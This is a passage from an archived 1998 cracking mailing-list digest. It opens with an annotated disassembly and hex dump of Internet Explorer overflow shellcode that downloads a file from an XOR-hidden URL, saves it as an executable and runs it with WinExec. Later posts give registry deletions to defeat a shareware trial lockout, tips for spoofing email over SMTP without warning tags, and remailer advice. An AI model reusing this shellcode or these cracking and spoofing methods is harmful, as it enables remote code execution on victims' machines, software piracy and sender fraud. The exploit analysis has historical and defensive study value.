  910. > stuff in the exploit string.
  911.  
  912. 0057CD10: 33C9                         xor    ecx,ecx
  913. 0057CD12: 66B95D01                     mov    cx,0015D
  914. 0057CD16: 03CD                         add    ecx,ebp
  915. 0057CD18: B238                         mov    dl,038  ;"8"
  916. 0057CD1A: 800180                       add    b,[ecx],080  ;"½
  917. 0057CD1D: 41                           inc    ecx
  918. 0057CD1E: 4A                           dec    edx
  919. 0057CD1F: 75F9                         jne    00057CD1A   ----
  920. 0057CD21: 90                           nop
  921. 0057CD22: 90                           nop
  922.  
  923. > It becomes clear where we're going :)
  924. > Let's allocate some memory. 65535 bytes to be precise.
  925.  
  926. 0057CD23: 66BAFFFF                     mov    dx,0FFFF  ;"__"
  927. 0057CD27: 52                           push   edx
  928. 0057CD28: 33D2                         xor    edx,edx
  929. 0057CD2A: 52                           push   edx
  930. 0057CD2B: FF5618                       call   d,[esi][00018]
  931. 0057CD2E: 8BD8                         mov    ebx,eax
  932.  
  933. > Ok. Now we go ahead and call InternetOpenA and keep that Internet 
  934. handle
  935. > in EAX. Why do I call this function twice? I don't know. I was 
  936. debugging
  937. > and I never took it out. NOP it if you want. I don't care.
  938.  
  939. 0057CD30: 33D2                         xor    edx,edx
  940. 0057CD32: 52                           push   edx
  941. 0057CD33: 52                           push   edx
  942. 0057CD34: 52                           push   edx
  943. 0057CD35: 52                           push   edx
  944. 0057CD36: 90                           nop
  945. 0057CD37: 6681C25D01                   add    dx,0015D
  946. 0057CD3C: 03D5                         add    edx,ebp
  947. 0057CD3E: 52                           push   edx
  948. 0057CD3F: E83FFFFFFF                   call   00057CC83
  949. 0057CD44: E83AFFFFFF                   call   00057CC83
  950.  
  951. > Now we call InternetOpenUrlA, getting us ready to download a file from
  952. > the net into that buffer we allocated
  953.  
  954. 0057CD49: 33D2                         xor    edx,edx
  955. 0057CD4B: 52                           push   edx
  956. 0057CD4C: 52                           push   edx
  957. 0057CD4D: 6AFF                         push   0FF
  958. 0057CD4F: 52                           push   edx
  959. 0057CD50: 6681C26501                   add    dx,00165
  960. 0057CD55: 03D5                         add    edx,ebp
  961. 0057CD57: 52                           push   edx
  962. 0057CD58: 50                           push   eax
  963. 0057CD59: E82EFFFFFF                   call   00057CC8C
  964.  
  965. > We then go ahead and call InternetReadFile, downloading 65535 bytes 
  966. from the
  967. > net and into the buffer.
  968.  
  969. 0057CD5E: 8BD5                         mov    edx,ebp
  970. 0057CD60: 83C230                       add    edx,030
  971. 0057CD63: 90                           nop
  972. 0057CD64: 90                           nop
  973. 0057CD65: 52                           push   edx
  974. 0057CD66: 2BC9                         sub    ecx,ecx
  975. 0057CD68: 6649                         dec    cx
  976. 0057CD6A: 51                           push   ecx
  977. 0057CD6B: 53                           push   ebx
  978. 0057CD6C: 50                           push   eax
  979. 0057CD6D: E82CFFFFFF                   call   00057CC9E
  980.  
  981. > Call _lcreat, and make us a place to store what we downloaded.
  982.  
  983. 0057CD72: 33D2                         xor    edx,edx
  984. 0057CD74: 52                           push   edx
  985. 0057CD75: 6681C25D01                   add    dx,0015D
  986. 0057CD7A: 03D5                         add    edx,ebp
  987. 0057CD7C: 52                           push   edx
  988. 0057CD7D: FF5610                       call   d,[esi][00010]
  989.  
  990. > ok, call _lwrite and write the buffer to the file.
  991.  
  992. 0057CD80: 8BD5                         mov    edx,ebp
  993. 0057CD82: 83C230                       add    edx,030  ;"0"
  994. 0057CD85: 8B12                         mov    edx,[edx]
  995. 0057CD87: 52                           push   edx
  996. 0057CD88: 53                           push   ebx
  997. 0057CD89: 50                           push   eax
  998. 0057CD8A: 8BD8                         mov    ebx,eax
  999. 0057CD8C: FF560C                       call   d,[esi][0000C]
  1000.  
  1001. > Close the file with _lclose.
  1002.  
  1003. 0057CD8F: 53                           push   ebx
  1004. 0057CD90: FF5608                       call   d,[esi][00008]
  1005.  
  1006. > Now run what we downloaded by calling WinExec!
  1007.  
  1008. 0057CD93: 33D2                         xor    edx,edx
  1009. 0057CD95: 42                           inc    edx
  1010. 0057CD96: 52                           push   edx
  1011. 0057CD97: 6681C25C01                   add    dx,0015C
  1012. 0057CD9C: 03D5                         add    edx,ebp
  1013. 0057CD9E: 52                           push   edx
  1014. 0057CD9F: FF16                         call   d,[esi]
  1015.  
  1016. > And go ahead and kill the Internet Explorer process. It's pretty
  1017. > bung'd out by now, and if we don't kill it, it will kill itself :)
  1018.  
  1019. 0057CDA1: FF5614                       call   d,[esi][00014]
  1020.  
  1021. > The rest of this is left as an exercise to the reader, and is really 
  1022. only
  1023. > worth about 5 minutes of staring at. (Though it took about 5 or so 
  1024. hours to
  1025. > come up with!) Basically, you just gotta play around with your 
  1026. debugger
  1027. > and work those registers. Be clever, and you'll get something like 
  1028. this:
  1029.  
  1030.  0057CD98:             -           -           -2D 2D E6 EF
  1031.  0057CDA8:  EF AE E5 F8-E5 80 E8 F4-F4 F0 BA AF-AF F7 F7 F7
  1032.  0057CDB8:  AE EC B0 F0-E8 F4 AE E3-EF ED AF FE-E4 E9 EC E4
  1033.  0057CDC8:  EF E7 AF E9-E5 B4 DF ED-EB AF E6 EF-EF AE E5 F8
  1034.  0057CDD8:  E5 80 AD AD-AD AD AD AD-F3 9A 57 25-30 30 2D 2D
  1035.  0057CDE8:  2D 2D 2D 2D-2D 2D 2D 2D-2D 2D 2D 2D-2D 2D 2D 2D
  1036.  0057CDF8:  2D 2D 2D 2D-2D 2D 2D 2D-2D 2D 2D 2D-2D 24 25 26
  1037.  0057CE08:  27 28 29 2A-2B 2C 2D 2E-2F 30 31 32-33 34 35 36
  1038.  0057CE18:  37 38 39 3A-3B 3C 3D 3E-3F 40 80 81-82 83 84 85
  1039.  0057CE28:  86 87 88 E9-E8 4B FE FF-FF C0 74 F7-8A 2F 27 70
  1040.  0057CE38:  DB CD 57 22-3E 0D 0A 57-68 65 6E 20-79 6F 75 27
  1041.  0057CE48:  72 65 20 72-65 61 64 79-2C 20 63 6C-69 63 6B 20
  1042.  0057CE58:  68 65 72 65-2E 0D 0A 3C-2F 61 3E 0D-0A 3C 2F 63
  1043.  0057CE68:  65 6E 74 65-72 3E 0D 0A-3C 2F 62 6F-64 79 3E 0D
  1044.  0057CE78:  0A 3C 2F 68-74 6D 6C 3E-0D 0A 0D 0A-0D 0A 0D 0A
  1045.  0057CE88:  0D 0A      -           -           -
  1046.  
  1047. > Phew!
  1048.  
  1049.  
  1050. Anyway. The short and long of all that disassembly is this:
  1051.  
  1052.         1. It downloads a <64K file from the internet (any URL)
  1053.            Using the current firewall and proxy settings...
  1054.  
  1055.         2. It saves it as "foo.exe" on your desktop (probably)
  1056.         3. It runs the executable.
  1057.         4. To see which URL it is downloading, just XOR the tail end of 
  1058. the
  1059.            exploit string with 0x80's.
  1060.  
  1061.  
  1062. Hope you caught all that.
  1063.  
  1064. ------------------------------
  1065.  
  1066. A haiku:
  1067.  
  1068. Strike two for I.E.
  1069. Common buffer overflows
  1070. Is that all of them?
  1071.  
  1072. **************** (01/13/97)
  1073. ---
  1074.  
  1075.  
  1076. Liked it ? :-) 
  1077. Halvar
  1078.  
  1079. ______________________________________________________
  1080. Get Your Private, Free Email at **********************
  1081.  
  1082. =====End of Issue 116===================================
  1083.  
  1084.  
  1085.  
  1086.  
  1087. ========================================================
  1088. +HCU Maillist          Issue: 117             01/16/1998 
  1089. --------------------------------------------------------
  1090. Send Articles To:......................... *************
  1091. Info, Help, Unsubscription, etc:....... ****************
  1092. Web Repository.........................hcuml.home.ml.org
  1093. ========================================================
  1094.  
  1095. CONTENTS:
  1096.  
  1097. #1  Subject: Re: freemail
  1098.  
  1099. #2  Subject: could be an interesting protection, anyone checking?
  1100.  
  1101. #3  Subject: help on disassembling file
  1102.  
  1103. #4  Subject: smtp question - maybe i missed something (+gthorne)
  1104.  
  1105. #5  Subject: Re: Stuck with Everlock
  1106.  
  1107. #6  Subject: Anonymous Remailers
  1108.  
  1109. ARTICLES:
  1110.  
  1111. -----#1-------------------------------------------------
  1112. Subject: Re: freemail
  1113.  
  1114. >>>
  1115. When receiving email, as long as you use a psuedonym on your email 
  1116. account, everything will be fine. You can assume that everything going 
  1117. in and out of your email account can be read by any one at any 
  1118. time...there is no way to stop that (except by encrypting your emails, 
  1119. which somewhat detracts from the convenience of the medium), but you can 
  1120. stop that email account from being traced to your person or your PC.
  1121. <<<
  1122.  
  1123. Using a nymserver will shorten the exposure to just between the sender and
  1124. nymserver. Of course the sender could encrypt.
  1125.  
  1126. Encryption is handled quite painlessly by using Eudora Pro which has PGP
  1127. extensions built into it. (using PGP 5). Worth checking out...
  1128.  
  1129. ~~
  1130. Ghiribizzo
  1131.  
  1132. -----#2-------------------------------------------------
  1133. Subject: could be an interesting protection, anyone checking?
  1134.  
  1135. forwarded
  1136.  
  1137. -------------Forwarded Message-----------------
  1138.  
  1139. From:    Tony & CAthy, **********************
  1140. To:    , **********************
  1141.     
  1142. Date:    15-01-98  5:36 
  1143.  
  1144. RE:    request for tutorail: Firehand Ember 3.1.1
  1145.  
  1146. Sender: *************
  1147. Received: from galaxy.chez.com ([194.98.133.161] (may be forged))
  1148.     by dub-img-3.compuserve.com (8.8.6/8.8.6/2.10) with ESMTP id XAA05970
  1149.     for **************************** Wed, 14 Jan 1998 23:35:53 -0500 (EST)
  1150. Received: from dwx1.dwx.com (dns1.dwx.com [207.206.192.1])
  1151.     by galaxy.chez.com (8.8.5/8.8.5) with ESMTP id FAA25340
  1152.     for **************** Thu, 15 Jan 1998 05:35:08 +0100 (CET)
  1153. Received: from tony1.dwx.com (as-dwx-7-15.dwx.net [207.206.193.177])
  1154.     by dwx1.dwx.com (8.8.5/8.8.5) with SMTP id WAA28929
  1155.     for **************** Wed, 14 Jan 1998 22:34:08 -0600 (CST)
  1156. Message-ID: ***********************
  1157. Date: Wed, 14 Jan 1998 22:36:35 -0800
  1158. From: Tony & CAthy ***************
  1159. X-Mailer: Mozilla 2.0 (Win95; U)
  1160. MIME-Version: 1.0
  1161. To: *************
  1162. Subject: request for tutorail: Firehand Ember 3.1.1
  1163. X-URL: ************************************
  1164. Content-Type: text/plain; charset=us-ascii
  1165. Content-Transfer-Encoding: 7bit
  1166.  
  1167. I would like to see a tutorial on cracking Firehand Ember 3.1.1
  1168.  
  1169.     from ***************** It can detect that it's code has been
  1170.  
  1171.     altered and then it locks you out and warns you not to try it
  1172.  
  1173.     again or it will delete your hard drive etc.... I think it 
  1174.  
  1175.     would be VERY interresting.....
  1176.  
  1177.         Thanks for all your hard work.
  1178.  
  1179.  
  1180.                     +tc
  1181.  
  1182. -----#3-------------------------------------------------
  1183. Subject: help on disassembling file
  1184.  
  1185. Hi All
  1186.  
  1187. I am working on a demo which as several menu options disabled.
  1188. However using BRW 4.5 I saw that the menus are all initially
  1189. enabled.
  1190. I tried to bpx on enablemenuitem to see what I could find but
  1191. I was stuck inside MFC calls all the time.
  1192. Now comes my real problem:
  1193. When I tried to use wdasm89 on it the prog replied saying that the
  1194. file does not have a win95 header nor the other type headers like
  1195. PE, NE or 16 bit header. To disassemble I need to give the right
  1196. file offset to begin disassembling the file. How do I find it?
  1197. The demo docs says the program runs in win95 or win3.11 with
  1198. win32s. Maybe this is the problem.
  1199. I tried to find something using QuickView but maybe I don't know where
  1200. to look.
  1201. Any hints appreciated.
  1202.  
  1203. PopJack
  1204.  
  1205. ______________________________________________________
  1206. Get Your Private, Free Email at **********************
  1207.  
  1208. -----#4-------------------------------------------------
  1209. Subject: smtp question - maybe i missed something (+gthorne)
  1210.  
  1211.  
  1212. i know it is rare for me to ask much - but i have a question that i
  1213. noticed in the past and never really checked out - but heck maybe one of
  1214. you have run across a solution (other than just putting a fake return
  1215. address in netscape or using a remailer)
  1216.  
  1217. when using telnet (host) at port 25 to send email,
  1218.  
  1219. often, servers will put a message on your emails when you send them...
  1220.  
  1221. 'apparently from...'
  1222.  
  1223. which is clearly the mark of a spoofed message
  1224.  
  1225. has anyone heard of a way to keep it from doing this?
  1226. or is it as i suspect that you just need a different server...
  1227.  
  1228. if this is a simple solution that i just overlooked no problem :)
  1229. when i taught myself C way back when i missed some important small bits
  1230. that i learned after working with data structures, kinda like learning
  1231. division before addition...
  1232.  
  1233. (such is often the case with self teaching)
  1234.  
  1235. thanks in advance and take care all
  1236.  
  1237. +gthorne
  1238.  
  1239.  
  1240. -----#5-------------------------------------------------
  1241. Subject: Re: Stuck with Everlock
  1242.  
  1243. forwarded pupil
  1244. (fravia+)
  1245.  
  1246. -------------Forwarded Message-----------------
  1247.  
  1248. From:    Clark1d, ************************
  1249. To:    , 100114,453
  1250.     
  1251. Date:    15-01-98  5:17 
  1252.  
  1253. RE:    Re: Stuck with Everlock
  1254.  
  1255. Sender: ***************
  1256. Received: from imo11.mx.aol.com (imo11.mx.aol.com [198.81.19.165])
  1257.     by arl-img-1.compuserve.com (8.8.6/8.8.6/2.10) with ESMTP id XAA09146
  1258.     for **************************** Wed, 14 Jan 1998 23:16:55 -0500 (EST)
  1259. From: Clark1d *****************
  1260. Message-ID: ***************************
  1261. Date: Wed, 14 Jan 1998 22:53:52 EST
  1262. To: *************************
  1263. Subject: Re: Stuck with Everlock
  1264. Content-type: text/plain; charset=US-ASCII
  1265. Content-transfer-encoding: 7bit
  1266. Organization: AOL ********************
  1267. X-Mailer: Inet_Mail_Out (IMOv11)
  1268.  
  1269. Fravia - I really appreciate the response (and the encouragement).  In many of
  1270. +Orc's essays, he mentioned that a newbie such as me should pair up with a vet
  1271. for help and hints.  Do you know if any of the students would like to
  1272. volunteer.  I am sure everyone is rather busy, so I would try to not take much
  1273. of their time.  I believe that a little help early on will really give me a
  1274. jumpstart.
  1275.  
  1276. Also, I have obtained a great deal of information about assembly programming
  1277. and I am ingesting it as fast as I can.
  1278.  
  1279. Thanks
  1280.  
  1281.  
  1282. David
  1283.  
  1284. -----#6-------------------------------------------------
  1285. Subject: Anonymous Remailers
  1286.  
  1287. >(this tricks are only for SENDING mail, since receiving is not that
  1288. >much a problem)
  1289.  
  1290. Really? I find it the other way around. Safely receiving mail can be a real
  1291. headache and quite inconvenient when using nymservers.
  1292.  
  1293. >Note: Attention, you're NOT 100%ly untraceable, since some Wingates log 
  1294. >such activity. (most do not, though).
  1295.  
  1296. Yes. You should use anonymous remailers. I use ******************* for my
  1297. Ghiribizzo persona. It's only a type I remailer as this persona is only low
  1298. security but you can use type II (mixmaster) remailers if you need higher
  1299. security. You can get a list from the internet somewhere (do search
  1300. +remailer +anonymous).
  1301.  
  1302. Almost all are run by people who believe in privacy and are therefore not
  1303. logged. A lot also support PGP encryption and other tricks.
  1304.  
  1305. >You can send email by telnetting to a mailserver to 
  1306. >port 25 (telnet victim.com 25) and then using the SMTP commands.
  1307.  
  1308. You can also telnet to POP3 servers to collect mail. Commands are:
  1309.  
  1310. USER username
  1311. PASS password
  1312. RETR #        retrieve message number #
  1313. DELE #        delete message number #
  1314. QUIT
  1315.  
  1316. There are others (look for RFC) but these should get you through. I telnet
  1317. directly as I use some computers which have only telnet and netscape loaded
  1318. and netscape takes an eternity to load via network.
  1319.  
  1320. ~~
  1321. Ghiribizzo
  1322.  
  1323. =====End of Issue 117===================================
  1324.  
  1325.  
  1326.  
  1327.  
  1328. ========================================================
  1329. +HCU Maillist          Issue: 118             01/17/1998 
  1330. --------------------------------------------------------
  1331. Send Articles To:......................... *************
  1332. Info, Help, Unsubscription, etc:....... ****************
  1333. Web Repository.........................hcuml.home.ml.org
  1334. ========================================================
  1335.  
  1336. CONTENTS:
  1337.  
  1338. #1  Subject: ourprot.zip
  1339.  
  1340. #2  Subject: Ember
  1341.  
  1342. ARTICLES:
  1343.  
  1344. -----#1-------------------------------------------------
  1345. Subject: ourprot.zip
  1346.  
  1347. Did anyone download ourprot.zip? Mine wasn't complete and when I tried to
  1348. finish the d/l on my next session, I found that it had been removed
  1349. (possibly because Quine had cracked the 'heavy' protection?). Was the zip
  1350. useful? If so, could you please send a copy to me via email.
  1351.  
  1352. The trouble with the net is that everything seems to have such a short
  1353. lifespan. I remember trying to find OLDER versions of W32Dasm to have a
  1354. look at and all the FTP sites seem to be up to date and don't keep older
  1355. versions. Tip: use web sites which are updated infrequently. I tried one of
  1356. Fravia's mirrors but the last update was in November!
  1357.  
  1358. ~~
  1359. Ghiribizzo
  1360.  
  1361. -----#2-------------------------------------------------
  1362. Subject: Ember
  1363.  
  1364. As coincidence may have it I was messing around with Ember also. 
  1365. I thought that it was a very interesting reaction to failed crack attemps. 
  1366. After the first lock out if you uninstall and reinstall it, you will be
  1367. able to access
  1368. it but the trial period will be expired. If you continue fail to crack it
  1369. again it will
  1370. go itno what it calls "Self-Defense" Mode and won't even enter the program.
  1371. I find it kinda interesting that it says the policy for registering it
  1372. after this happens is
  1373. "No Questions Asked". If you try to unistall/reinstall now it won't let you
  1374. in. I tried
  1375. for a bit to figure out how it checked for Self-Defense mode using File
  1376. Monitor and Reg Monitor but didn't see anything that looked suspicious. 
  1377. This was going to be my first crack but I think I may be in over my head.
  1378. Any suggestions on how the program may detect that it's in Self-Defense
  1379. mode after reintsalling?
  1380.  
  1381.     Joe Dark
  1382.  
  1383.  
  1384. =====End of Issue 118===================================
  1385.  
  1386.  
  1387.  
  1388.  
  1389. ========================================================
  1390. +HCU Maillist          Issue: 119             01/18/1998 
  1391. --------------------------------------------------------
  1392. Send Articles To:......................... *************
  1393. Info, Help, Unsubscription, etc:....... ****************
  1394. Web Repository.........................hcuml.home.ml.org
  1395. ========================================================
  1396.  
  1397. CONTENTS:
  1398.  
  1399. #1  Subject: firehand
  1400.  
  1401. #2  Subject: ember
  1402.  
  1403. #3  Subject: finding program entry points
  1404.  
  1405. #4  Subject: smtp port 25
  1406.  
  1407. #5  Subject: none
  1408.  
  1409. ARTICLES:
  1410.  
  1411. -----#1-------------------------------------------------
  1412. Subject: firehand
  1413.  
  1414. I haven't seen a protection that threatens to wipe your HD before. My
  1415. initial feelings is that it is a bluff, but I think the legality of such an
  1416. action may be more interesting than it's implementation.
  1417.  
  1418. ~~
  1419. Ghiribizzo
  1420.  
  1421.  
  1422.  
  1423. -----#2-------------------------------------------------
  1424. Subject: ember
  1425.  
  1426. it isn't so hard
  1427. just delete the HKLM/software/microsoft/windows/msofc
  1428. & HKLM/software/fireworx/ember/ key & user entries
  1429. from the registry
  1430.  
  1431. i don't think it really deletes stuff btw.
  1432.  
  1433. +SNiKkEL
  1434.  
  1435. -----#3-------------------------------------------------
  1436. Subject: finding program entry points
  1437.  
  1438.  
  1439.  
  1440. i.e. press F4, F3, F8.
  1441.  
  1442.  
  1443.  
  1444. ~~
  1445.  
  1446. -----#4-------------------------------------------------
  1447. Subject: smtp port 25
  1448.  
  1449. The 'apparently from..' tag gets added when the SMTP is not adhered to.
  1450. Usually due to forgetting the 'from' bit of the header or (easier to
  1451. forget) the HELO part of the protocol.
  1452.  
  1453. If you're writing a program to spoof mail automatically, you'll need to put
  1454. in some checking for 'mis-sent' commands. For some reason, however, the
  1455. first command usually is not received properly - this corresponds (usually)
  1456. to the HELO command. I suspect this is why you are getting the 'apparently
  1457. from' tags.
  1458.  
  1459. I'm writing this from memory as it has been several years since I spoofed
  1460. email. There are probably some FAQs on the net somewhere (I wrote one in a
  1461. previous persona - it may still be kicking around).
  1462.  
  1463. I hope this helps. If you still can't get it to work, please email me and
  1464. I'll look into it as I have definitely sent fake mail which didn't have the
  1465. tags.
  1466.  
  1467. ~~
  1468. Ghiribizzo
  1469.  
  1470. -----#5-------------------------------------------------
  1471. Subject: none
  1472.  
  1473. Friends:
  1474.  
  1475.    Most of you are aware that I solved the +ORC riddle
  1476. a few months ago. We've all been waiting for Basilisk
  1477. to post the story on his web pages, but he's been very
  1478. busy with his work, and hasn't had the time to complete
  1479. his writings.
  1480.  
  1481.    While we were waiting on the Basilisk, it seems our
  1482. +teacher has decided to change the rules at the end of
  1483. the game. Now, we must also become hackers if we are
  1484. going to see the solution to +his riddle.
  1485.  
  1486.    The riddle points to a particular server, once you
  1487. locate that server, you must find a web page ("gate")
  1488. on it. Actualy, there are TWO web pages ("gates"), and
  1489. I located both of them, but you only have to find one
  1490. of them to continue to +Orcs web-site.
  1491.  
  1492.    Once you've located the "gate(s)", you find the 
  1493. +ORC link on the web page, and click it, to get to
  1494. another server. But you're not at +Orcs web page yet, so
  1495. you must search this second server to finaly find +his
  1496. web pages.
  1497.  
  1498.    Some of you were lucky enough to view these "gates",
  1499. because I've told a few people where they were, and I'm
  1500. sure the Basilisk has also, but for those of you who
  1501. were not that lucky, it's time to brush up on your
  1502. hacking skills.
  1503.  
  1504.    For some reason, BOTH of the "gates" have been
  1505. re-named, and now you'll need a login/password to view
  1506. them. Since I'm not a hacker, I don't know if they
  1507. still contain the link to the geocities server, but
  1508. maybe if you ever hack your way in, you'll let me know.
  1509.  
  1510.    As you'll learn, when the Basilisk gets the story
  1511. posted on his web site, I've known about these "gates"
  1512. for a year and a half. I've visited them often, because
  1513. they contain a wealth of information. They were designed
  1514. for hackers and crackers, and there was no need to
  1515. re-name them, or block access, because they are
  1516. legendary on the net. I did not tell anyone about them
  1517. because I thought that +Orcs web site was the treasure
  1518. to be found, not the "gates".
  1519.  
  1520.    Perhaps +he did this for security reasons, or maybe
  1521. this is his way of telling us the final solution to the
  1522. riddle HAS been found, since he never realy came right
  1523. out and said so, who knows?
  1524.  
  1525.    Whatever the reason, my time is too limited to play
  1526. this game when the rules change mid-stream. Anyone
  1527. wishing to continue this game can contact me for any
  1528. information I have, except for +his real name, e-mail
  1529. address, real address, and picture.
  1530.  
  1531.    You'll have to "prove" that you're actualy working
  1532. on the riddle by telling me what you've found, I don't
  1533. want to "give" the information to lamers so they can
  1534. take credit for my hard work. The rest will be up to
  1535. you, until the rules change again.
  1536.  
  1537.                                   Hackmore Readrite
  1538.                                   Data Miners Inc.
  1539.  
  1540.  
  1541.  
  1542. =====End of Issue 119===================================
  1543.  
  1544.  
  1545.  
  1546.  
  1547. ========================================================
  1548. +HCU Maillist          Issue: 120             01/19/1998 
  1549. --------------------------------------------------------
  1550. Send Articles To:......................... *************
  1551. Info, Help, Unsubscription, etc:....... ****************
  1552. Web Repository.........................hcuml.home.ml.org
  1553. ========================================================
  1554.  
  1555. CONTENTS:
  1556.  
  1557. #1  Subject: Hcu Repository
  1558.  
  1559. #2  Subject: Assembly
  1560.  
  1561. ARTICLES:
  1562.  
  1563. -----#1-------------------------------------------------
  1564. Subject: Hcu Repository
  1565.  
  1566. Hi Everyone..
  1567. I have been using a JDK 1.1 patched version of Netscape for a while now,
  1568. and the HCU test search applet was tested using that.
  1569. I recently went to the applet page using a JDK 1.0 browser, only to find it
  1570. didn't work...
  1571.  
  1572. If someone had told me sooner, I could have made the fix in a few
  1573. seconds.(Only needed to change a couple of lines)
  1574. I can only assume
  1575. 1) No-one cares
  1576. 2) No one checked the page
  1577. 3) Every one assumes I am a terrible programmer :(
  1578.  
  1579. Anyway, it works now.(Tested with Netscape 4)
  1580. The link is:
  1581. ***************************************************
  1582.  
  1583. Please send comments, EVEN IF IT DOESN'T WORK!
  1584.  
  1585. +Alt-F4
  1586.  
  1587. -----#2-------------------------------------------------
  1588. Subject: Assembly
  1589.  
  1590. I'm still learning assembly and there is something that I'm not
  1591. sure of. The TEST command. It compares two things bit by
  1592. bit and sets Z to 1 if it's the same right? I see this line in programs
  1593. all the time,
  1594.  
  1595. TEST    AL, AL
  1596.  
  1597. and sometimes Z = 1 and sometimes not. Can someone explain this
  1598. to me?
  1599.  
  1600.     Joe Dark
  1601.  
  1602.  
  1603. =====End of Issue 120===================================
  1604.  
  1605.  
  1606.  
  1607.  
  1608.